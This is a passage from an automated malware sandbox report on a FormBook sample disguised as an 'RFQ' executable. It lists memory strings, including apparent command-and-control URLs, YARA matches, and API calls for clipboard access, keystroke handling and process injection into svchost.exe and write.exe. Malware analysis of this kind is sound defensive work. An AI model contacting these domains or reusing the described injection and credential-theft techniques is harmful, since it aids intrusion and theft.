(prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: write.exe, 00000006.00000002.4162310977.0000000005C52000.00000004.10000000.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.00000000036D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs
            Source: TNPukQnytLH.exe, 00000007.00000002.4163624707.0000000004C7B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nmh6.site
            Source: TNPukQnytLH.exe, 00000007.00000002.4163624707.0000000004C7B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nmh6.site/8qne/
            Source: write.exe, 00000006.00000002.4162310977.0000000005478000.00000004.10000000.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.0000000002EF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://6329.vhjhbv.com/4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: write.exe, 00000006.00000002.4162310977.000000000560A000.00000004.10000000.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: write.exe, 00000006.00000002.4160569986.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: write.exe, 00000006.00000002.4160569986.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: write.exe, 00000006.00000002.4160569986.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: write.exe, 00000006.00000002.4160569986.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033uh)
            Source: write.exe, 00000006.00000002.4160569986.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: write.exe, 00000006.00000002.4160569986.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: write.exe, 00000006.00000003.2351219624.00000000079F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: RFQ - HTS45785-24-0907I000.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C3B3 NtClose,1_2_0042C3B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B60 NtClose,LdrInitializeThunk,1_2_03972B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03972DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03972C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039735C0 NtCreateMutant,LdrInitializeThunk,1_2_039735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974340 NtSetContextThread,1_2_03974340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974650 NtSuspendThread,1_2_03974650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B80 NtQueryInformationFile,1_2_03972B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BA0 NtEnumerateValueKey,1_2_03972BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BF0 NtAllocateVirtualMemory,1_2_03972BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BE0 NtQueryValueKey,1_2_03972BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AB0 NtWaitForSingleObject,1_2_03972AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AD0 NtReadFile,1_2_03972AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AF0 NtWriteFile,1_2_03972AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F90 NtProtectVirtualMemory,1_2_03972F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FB0 NtResumeThread,1_2_03972FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FA0 NtQuerySection,1_2_03972FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FE0 NtCreateFile,1_2_03972FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F30 NtCreateSection,1_2_03972F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F60 NtCreateProcessEx,1_2_03972F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E80 NtReadVirtualMemory,1_2_03972E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EA0 NtAdjustPrivilegesToken,1_2_03972EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EE0 NtQueueApcThread,1_2_03972EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E30 NtWriteVirtualMemory,1_2_03972E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DB0 NtEnumerateKey,1_2_03972DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DD0 NtDelayExecution,1_2_03972DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D10 NtMapViewOfSection,1_2_03972D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D00 NtSetInformationFile,1_2_03972D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D30 NtUnmapViewOfSection,1_2_03972D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CA0 NtQueryInformationToken,1_2_03972CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CC0 NtQueryVirtualMemory,1_2_03972CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CF0 NtOpenProcess,1_2_03972CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C00 NtQueryInformationProcess,1_2_03972C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C60 NtCreateKey,1_2_03972C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973090 NtSetValueKey,1_2_03973090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973010 NtOpenDirectoryObject,1_2_03973010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039739B0 NtGetContextThread,1_2_039739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D10 NtOpenProcessToken,1_2_03973D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D70 NtOpenThread,1_2_03973D70
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B4650 NtSuspendThread,LdrInitializeThunk,6_2_047B4650
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B4340 NtSetContextThread,LdrInitializeThunk,6_2_047B4340
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_047B2C70
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2C60 NtCreateKey,LdrInitializeThunk,6_2_047B2C60
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_047B2CA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_047B2D30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_047B2D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_047B2DF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2DD0 NtDelayExecution,LdrInitializeThunk,6_2_047B2DD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_047B2EE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_047B2E80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2F30 NtCreateSection,LdrInitializeThunk,6_2_047B2F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2FE0 NtCreateFile,LdrInitializeThunk,6_2_047B2FE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2FB0 NtResumeThread,LdrInitializeThunk,6_2_047B2FB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2AF0 NtWriteFile,LdrInitializeThunk,6_2_047B2AF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2AD0 NtReadFile,LdrInitializeThunk,6_2_047B2AD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2B60 NtClose,LdrInitializeThunk,6_2_047B2B60
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_047B2BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_047B2BE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_047B2BA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B35C0 NtCreateMutant,LdrInitializeThunk,6_2_047B35C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B39B0 NtGetContextThread,LdrInitializeThunk,6_2_047B39B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2C00 NtQueryInformationProcess,6_2_047B2C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2CF0 NtOpenProcess,6_2_047B2CF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2CC0 NtQueryVirtualMemory,6_2_047B2CC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2D00 NtSetInformationFile,6_2_047B2D00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2DB0 NtEnumerateKey,6_2_047B2DB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2E30 NtWriteVirtualMemory,6_2_047B2E30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2EA0 NtAdjustPrivilegesToken,6_2_047B2EA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2F60 NtCreateProcessEx,6_2_047B2F60
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2FA0 NtQuerySection,6_2_047B2FA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2F90 NtProtectVirtualMemory,6_2_047B2F90
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2AB0 NtWaitForSingleObject,6_2_047B2AB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B2B80 NtQueryInformationFile,6_2_047B2B80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B3010 NtOpenDirectoryObject,6_2_047B3010
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B3090 NtSetValueKey,6_2_047B3090
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B3D70 NtOpenThread,6_2_047B3D70
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B3D10 NtOpenProcessToken,6_2_047B3D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_00878DB0 NtCreateFile,6_2_00878DB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_00878F20 NtReadFile,6_2_00878F20
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_008790B0 NtClose,6_2_008790B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_00879010 NtDeleteFile,6_2_00879010
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_00879210 NtAllocateVirtualMemory,6_2_00879210
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044EB590_2_0044EB59
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_040B4EF00_2_040B4EF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183F31_2_004183F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030901_2_00403090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E9B31_2_0042E9B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402BCE1_2_00402BCE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402BD01_2_00402BD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FCC31_2_0040FCC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FCBA1_2_0040FCBA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165DE1_2_004165DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165E31_2_004165E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FEE31_2_0040FEE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF631_2_0040DF63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A003E61_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F01_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA3521_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C02C01_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E02741_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A001AA1_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F41A21_2_039F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F81CC1_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA1181_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039301001_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C81581_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D20001_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C01_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039647501_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039407701_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C6E01_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A005911_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039405351_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EE4F61_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E44201_2_039E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F24461_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F6BD71_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB401_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA801_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0A9A61_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A01_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039569621_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039268B81_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E8F01_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A8401_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428401_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BEFA01_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932FC81_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960F301_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E2F301_2_039E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03982F281_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4F401_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952E901_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FCE931_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEEDB1_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AE0D1_2_0393AE0D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEE261_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940E591_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958DBF1_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DCD1F1_2_039DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AD001_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0CB51_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930CF21_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940C001_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398739A1_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F132D1_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392D34C1_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039452A01_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B2C01_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395D2F01_2_0395D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E12ED1_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B1B01_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0B16B1_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F1721_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397516C1_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EF0CC1_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039470C01_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F70E91_2_039F70E9
